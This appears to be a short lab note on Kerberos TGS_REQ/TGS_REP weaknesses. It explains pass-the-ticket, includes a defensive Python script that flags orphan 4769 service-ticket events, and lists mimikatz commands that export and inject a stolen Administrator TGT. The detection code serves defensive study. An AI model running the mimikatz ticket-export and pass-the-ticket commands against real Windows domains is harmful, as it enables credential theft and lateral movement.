Security issues in TGS_REQ & TGS_REP

Pass The Ticket

Both steps are validated using the ticket obtained from AS_REQ, so that single ticket is all that is needed to move laterally.
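The defender-side corollary of this, as an added example that is not part of the original article: because a reused TGT yields service tickets without a fresh AS_REQ, a domain controller's log shows TGS requests (Windows Security event 4769) for an account and client address that never produced a TGT request (event 4768) from that same address. The script below parses a constructed, simplified event sample and flags such orphan 4769 events; the 10-hour window is an assumption matching the Active Directory default TGT lifetime.

```python
"""Heuristic detection of ticket reuse (pass-the-ticket style) from DC events.

Added example, not from the original article. A 4769 (service ticket
requested) whose (account, client address) pair has no 4768 (TGT
requested) within the TGT lifetime is suspicious: the TGT used for the
TGS_REQ was obtained elsewhere. All log lines below are constructed.
"""
from dataclasses import dataclass
from datetime import datetime, timedelta
from typing import Dict, List, Optional, Tuple

# Constructed sample: timestamp, event id, account, client IP, [service]
SAMPLE_LOG = """\
2024-05-01T08:00:01 4768 alice 10.0.0.5
2024-05-01T08:00:03 4769 alice 10.0.0.5 cifs/fs01
2024-05-01T08:05:10 4769 alice 10.0.0.5 http/web01
2024-05-01T09:12:44 4769 administrator 10.0.0.77 cifs/dc01
2024-05-01T09:13:02 4769 administrator 10.0.0.77 ldap/dc01
"""


@dataclass
class Event:
    ts: datetime
    event_id: int
    account: str
    client: str
    service: Optional[str]


def parse_log(text: str) -> List[Event]:
    """Parse the simplified whitespace-separated event format above."""
    events: List[Event] = []
    for line in text.splitlines():
        parts = line.split()
        if len(parts) < 4:
            continue  # skip blank or malformed lines
        service = parts[4] if len(parts) > 4 else None
        events.append(
            Event(datetime.fromisoformat(parts[0]), int(parts[1]),
                  parts[2].lower(), parts[3], service)
        )
    return events


def find_orphan_tgs(events: List[Event],
                    window: timedelta = timedelta(hours=10)) -> List[Event]:
    """Return 4769 events with no 4768 for the same (account, client)
    within `window` (assumption: AD default TGT lifetime of 10 hours).

    Caveat: a TGT issued before log collection started also looks
    orphaned, so results need correlation with the collection start.
    """
    last_tgt: Dict[Tuple[str, str], datetime] = {}
    orphans: List[Event] = []
    for ev in sorted(events, key=lambda e: e.ts):
        key = (ev.account, ev.client)
        if ev.event_id == 4768:
            last_tgt[key] = ev.ts
        elif ev.event_id == 4769:
            seen = last_tgt.get(key)
            if seen is None or ev.ts - seen > window:
                orphans.append(ev)
    return orphans


if __name__ == "__main__":
    for ev in find_orphan_tgs(parse_log(SAMPLE_LOG)):
        print(f"orphan TGS: {ev.ts} {ev.account} from {ev.client} -> {ev.service}")
```

Collecting 4768 requires the "Audit Kerberos Authentication Service" policy to be enabled on the domain controllers; without it every 4769 looks orphaned and the heuristic is useless.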

Using mimikatz

sekurlsa::tickets /export  // export the tickets on this host
kerberos::list  // list the tickets on this host
kerberos::purge  // purge all tickets on this host
kerberos::ptt c:\[0;86e204]-2-0-60a00000-Administrator@krbtgt-TEST.LOCAL.kirbi  // import a ticket


Note: I was a normal local administrator user on Win7, and mimikatz was started with administrator privileges, so klist in a cmd running with normal privileges cannot see the tickets imported by mimikatz. I fell into a big trap here.

Silver tickets

Covered later, together with golden tickets.

Later sections

Because I have not finished setting up a delegation lab and my understanding is still far from thorough, the following parts are deferred.

  1. Kerberoasting
  2. Unconstrained delegation
  3. Constrained delegation
  4. Resource-based constrained delegation attacks
Y4er